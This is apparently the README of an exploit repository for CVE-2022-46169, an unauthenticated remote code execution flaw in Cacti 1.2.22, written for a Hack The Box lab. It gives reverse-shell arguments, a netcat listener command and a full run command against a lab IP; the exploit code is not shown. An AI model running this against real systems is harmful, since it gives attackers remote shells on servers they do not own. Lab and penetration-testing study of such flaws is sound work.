This repo contains an exploit for CVE-2022-46169, affecting Cacti 1.2.22. This vulnerability allows an unauthenticated attacker to execute arbitrary code on the affected system.
If you want a detailed write up of how this exploit is possible please reference this Rapid7 post. They go into great detail on specifics.
I wrote this code, with help from chatGPT for a Hack The Box machine called MonitorsTwo for educational purposes
Arguments:
-u URL of Cacti Application
-lhost IP address of machine you want the shell on
-lport Port of the machine you want the shell on
Set up a listener on your local machine with netcat nc -lvnp 9001
Run the exploit against the target
python3 CVE-2022-46169.py -url http://10.10.11.211/ -lhost 10.10.14.3 -lport 9001
This Proof of Concept (PoC) is meant strictly for educational and testing objectives. Engaging this PoC on any system or network without clear authorization from the system owner is unlawful and could lead to legal action. The creator accepts no responsibility for any harm arising from the proper or improper application of this PoC. Employ at your own peril.
https://www.rapid7.com/db/vulnerabilities/debian-cve-2022-46169/